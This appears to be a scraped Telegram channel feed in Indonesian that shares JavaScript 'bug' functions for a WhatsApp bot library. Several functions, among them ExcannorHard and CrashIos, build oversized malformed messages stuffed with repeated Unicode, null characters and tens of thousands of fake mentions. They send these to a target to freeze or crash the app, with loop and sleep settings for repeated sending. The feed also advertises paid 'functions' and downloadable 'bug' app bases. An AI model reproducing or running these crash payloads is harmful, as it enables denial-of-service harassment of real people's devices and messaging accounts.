async function ExcannorVisi(sock, target) {
const msg = generateWAMessageFromContent(target, {
viewOnceMessage: {
message: {
interactiveResponseMessage: {
body: {
text: "#ExcannorTeam",
format: "DEFAULT"
},
nativeFlowResponseMessage: {
name: "address_message",
paramsJson: `{"values":{"in_pin_code":"999999","building_name":"FourLight","landmark_area":"X","address":"Ekso","tower_number":"Ekso","city":"pace","name":"d7y","phone_number":"999999999999","house_number":"xxx","floor_number":"xxx","state":"D | ${"๊ฆพ".repeat(100000)}"}}`,
version: 3
},
contextInfo: {
mentionedJid: Array.from({ length: 1900 }, (_, y) => `62895322871902${y + 1}@s.whatsapp.net`)
}
}
}
}
}, {
ephemeralExpiration: 0,
forwardingScore: 0,
isForwarded: false,
font: Math.floor(Math.random() * 9),
background: "#" + Math.floor(Math.random() * 16777215).toString(16).padStart(6, "0")
});
await sock.relayMessage("status@broadcast", msg.message, {
messageId: msg.key.id,
statusJidList: [target],
additionalNodes: [{
tag: "meta",
attrs: {},
content: [{
tag: "mentioned_users",
attrs: {},
content: [{ tag: "to", attrs: { jid: target }, content: undefined }]
}]
}]
});
await sock.relayMessage(target, {
statusMentionMessage: {
message: { protocolMessage: {
key: msg.key, type: 25 } }
}
}, {});
console.log("Successfully Sending Bugs", target);
}Effect ๐ฆ : Delay Hard Visible
Loop : 100
Sleep : 1000
Gak Bisa Salin?
Cek Kesini :
Source : @asyncfunctionx
Credits : ยฉ ArgaModss
Minimal Kalo Mau Share Jangan Delete Cr
async function ExcannorHard(target, mention) {
console.log(chalk.red(`Succes Send Bug To Target ${target}`));
let message = {
viewOnceMessage: {
message: {
stickerMessage: {
url: "https://mmg.whatsapp.net/v/t62.7161-24/10000000_1197738342006156_5361184901517042465_n.enc?ccb=11-4&oh=01_Q5Aa1QFOLTmoR7u3hoezWL5EO-ACl900RfgCQoTqI80OOi7T5A&oe=68365D72&_nc_sid=5e03e0&mms3=true",
fileSha256: "xUfVNM3gqu9GqZeLW3wsqa2ca5mT9qkPXvd7EGkg9n4=",
fileEncSha256: "zTi/rb6CHQOXI7Pa2E8fUwHv+64hay8mGT1xRGkh98s=",
mediaKey: "nHJvqFR5n26nsRiXaRVxxPZY54l0BDXAOGvIPrfwo9k=",
mimetype: "image/webp",
directPath:
"/v/t62.7161-24/10000000_1197738342006156_5361184901517042465_n.enc?ccb=11-4&oh=01_Q5Aa1QFOLTmoR7u3hoezWL5EO-ACl900RfgCQoTqI80OOi7T5A&oe=68365D72&_nc_sid=5e03e0",
fileLength: { low: 1, high: 0, unsigned: true },
mediaKeyTimestamp: {
low: 1746112211,
high: 0,
unsigned: false,
},
firstFrameLength: 19904,
firstFrameSidecar: "KN4kQ5pyABRAgA==",
isAnimated: true,
contextInfo: {
mentionedJid: [
"0@s.whatsapp.net",
...Array.from(
{
length: 40000,
},
() =>
"1" + Math.floor(Math.random() * 500000) + "@s.whatsapp.net"
),
],
groupMentions: [],
entryPointConversionSource: "non_contact",
entryPointConversionApp: "whatsapp",
entryPointConversionDelaySeconds: 467593,
},
stickerSentTs: {
low: -1939477883,
high: 406,
unsigned: false,
},
isAvatar: false,
isAiSticker: false,
isLottie: false,
},
},
},
};
const msg = generateWAMessageFromContent(target, message, {});
await client.relayMessage("status@broadcast", msg.message, {
messageId: msg.key.id,
statusJidList: [target],
additionalNodes: [
{
tag: "meta",
attrs: {},
content: [
{
tag: "mentioned_users",
attrs: {},
content: [
{
tag: "to",
attrs: { jid: target },
content: undefined,
},
],
},
],
},
],
});
}Effect ๐ฆ : Delay Hard
Loop : 80
Sleep : 900
Gak Bisa Salin?
Cek Kesini :
Source : @asyncfunctionx
Credits : ยฉ ArgaModss
Minimal Kalo Mau Share Jangan Delete Cr
โค2๐ฅ1๐คฎ1๐1
Buat Kalian Kalo Mau Beli Partner Function Yang Ke Urus Dan Berkualitan, Soal Harga Bisa Nego
Click Disini
Click Disini
๐1
</.JavaScript Function pinned ยซBuat Kalian Kalo Mau Beli Partner Function Yang Ke Urus Dan Berkualitan, Soal Harga Bisa Nego Click Disiniยป
async function ExcannorFcIos(sock, target) {
const msg = {
message: {
locationMessage: {
degreesLatitude: 21.1266,
degreesLongitude: -11.8199,
name: "Excannor - TryHards ยฟ?" + "\u0000".repeat(70000) + "๐๐ต๐ด๐ฟ".repeat(60000),
url: "https://github.com/urz1ee",
contextInfo: {
externalAdReply: {
quotedAd: {
advertiserName: "๐๐ต๐ด๐ฟ".repeat(60000),
mediaType: "IMAGE",
jpegThumbnail: "/9j/4AAQSkZJRgABAQAAAQABAAD/",
caption: "@ArgaExcannor" + "๐๐ต๐ด๐ฟ".repeat(70000)
},
placeholderKey: {
remoteJid: "0s.whatsapp.net",
fromMe: false,
id: "ABCDEF1234567890"
}
}
}
}
}
};
await sock.relayMessage("status@broadcast", msg.message, {
messageId: msg.key?.id || Math.random().toString(36).slice(2),
statusJidList: [target],
additionalNodes: [
{
tag: "meta",
attrs: {},
content: [
{
tag: "mentioned_users",
attrs: {},
content: [
{
tag: "to",
attrs: { jid: target }
}
]
}
]
}
]
});
}Effect ๐ฆ : Fc Invis Ios
Loop : 80
Sleep : 700
Gak Bisa Salin?
Cek Kesini :
Source : @asyncfunctionx
Credits : ยฉ ArgaModss
Minimal Kalo Mau Share Jangan Delete Cr
๐4๐ฅ2โค1๐ฅฐ1
BASE APK XTORDCV.zip
17.5 KB
TAMPILAN CEK SENDIRI๐ ๐
NO SHARE PT/TKโ ๏ธ
NO JAULโ ๏ธ
KHUSUS SINI AJAโ ๏ธ
JUAL? SIAP TERIMA KONSEKUENSIโ ๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
base web.zip
14.2 KB
TAMPILAN CEK SENDIRI๐ ๐
NO SHARE PT/TKโ ๏ธ
NO JAULโ ๏ธ
KHUSUS SINI AJAโ ๏ธ
JUAL? SIAP TERIMA KONSEKUENSIโ ๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
web bug new.zip
1.5 MB
TAMPILAN CEK SENDIRI๐ ๐
NO SHARE PT/TKโ ๏ธ
NO JAULโ ๏ธ
KHUSUS SINI AJAโ ๏ธ
JUAL? SIAP TERIMA KONSEKUENSIโ ๏ธ
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2
gatau masi bisa atau engga, kalo error fix saja, kalian kan developer ๐
๐คฃ4
async function CrashIos(target) {
let xios = "๐๐ต๐ด๐ฟ".repeat(333333)
await generateWAMessageFromContent(target, proto.Message.fromObject({
groupMentionedMessage: {
message: {
interactiveMessage: {
header: {
documentMessage: {
url: "https://mmg.whatsapp.net/v/t62.7119-24/40377567_1587482692048785_2833698759492825282_n.enc?ccb=11-4&oh=01_Q5AaIEOZFiVRPJrllJNvRA-D4JtOaEYtXl0gmSTFWkGxASLZ&oe=666DBE7C&_nc_sid=5e03e0&mms3=true",
mimetype: "application/json",
fileSha256: "ld5gnmaib+1mBCWrcNmekjB4fHhyjAPOHJ+UMD3uy4k=",
fileLength: "999999999999",
pageCount: 7.554679297577082e+23,
mediaKey: "5c/W3BCWjPMFAUUxTSYtYPLWZGWuBV13mWOgQwNdFcg=",
fileName: "าArgaTryhards ยฟ?",
fileEncSha256: "pznYBS1N6gr9RZ66Fx7L3AyLIU2RY5LHCKhxXerJnwQ=",
directPath: "/v/t62.7119-24/40377567_1587482692048785_2833698759492825282_n.enc?ccb=11-4&oh=01_Q5AaIEOZFiVRPJrllJNvRA-D4JtOaEYtXl0gmSTFWkGxASLZ&oe=666DBE7C&_nc_sid=5e03e0",
mediaKeyTimestamp: "1715880173"
},
hasMediaAttachment: true
},
body: {
text: "าArgaTryhards ยฟ?" + xios
},
nativeFlowMessage: {
messageParamsJson: JSON.stringify({
name: "galaxy_message",
flow_action: "navigate",
flow_action_payload: { screen: "CTZ_SCREEN" },
flow_cta: "๐",
flow_id: "UNDEFINEDONTOP",
flow_message_version: "9.903",
flow_token: "UNDEFINEDONTOP"
})
},
contextInfo: {
mentionedJid: Array.from({ length: 5 }, () => "1@newsletter"),
groupMentions: [{
groupJid: "1@newsletter",
groupSubject: "UNDEFINEDONTOP"
}]
}
}
}
}
}), {});
await sock.relayMessage(target, {
contactMessage: {
displayName: "าArgaTryhardsยฟ?" + "๐๐ต๐ด๐ฟ".repeat(60000),
vcard: `BEGIN:VCARD
VERSION:3.0
N:าArgaTryhards ยฟ?
FN:าArgaTryhards ยฟ?
item1.TEL;waid=526421147692:526421147692
item1.X-ABLabel:Click here to chat
item2.EMAIL;type=INTERNET:YT: https://youtube.com/@ArgaExcannor
item2.X-ABLabel:YouTube
item4.ADR:;;Brasil, AR, SP;;;;
item4.X-ABLabel:Region
END:VCARD`,
contextInfo: {
forwardingScore: 1,
isForwarded: true,
quotedAd: {
advertiserName: "x",
mediaType: "IMAGE",
jpegThumbnail: null,
caption: "x"
},
placeholderKey: {
remoteJid: "0@s.whatsapp.net",
fromMe: false,
id: "ABCDEF1234567890"
}
}
}
}, {});
await sock.relayMessage(target, {
locationMessage: {
degreesLatitude: 173.282,
degreesLongitude: -19.378,
name: "Sedikit Sakit Namun Berusaha Buat Tetap Sabar" + "๐๐ต๐ด๐ฟ".repeat(60000),
url: "https://youtube.com/@ArgaExcannor",
contextInfo: {
forwardingScore: 1,
isForwarded: true,
quotedAd: {
advertiserName: "x",
mediaType: "IMAGE",
jpegThumbnail: null,
caption: "x"
},
placeholderKey: {
remoteJid: "0@s.whatsapp.net",
fromMe: false,
id: "ABCDEF1234567890"
}
}
}
}, {
participant: { jid: target }
});
}Effect ๐ฆ : Crash Ios
Loop : 80
Sleep : 700
Gak Bisa Salin?
Cek Kesini :
Source : @asyncfunctionx
Credits : ยฉ ArgaModss
Minimal Kalo Mau Share Jangan Delete Cr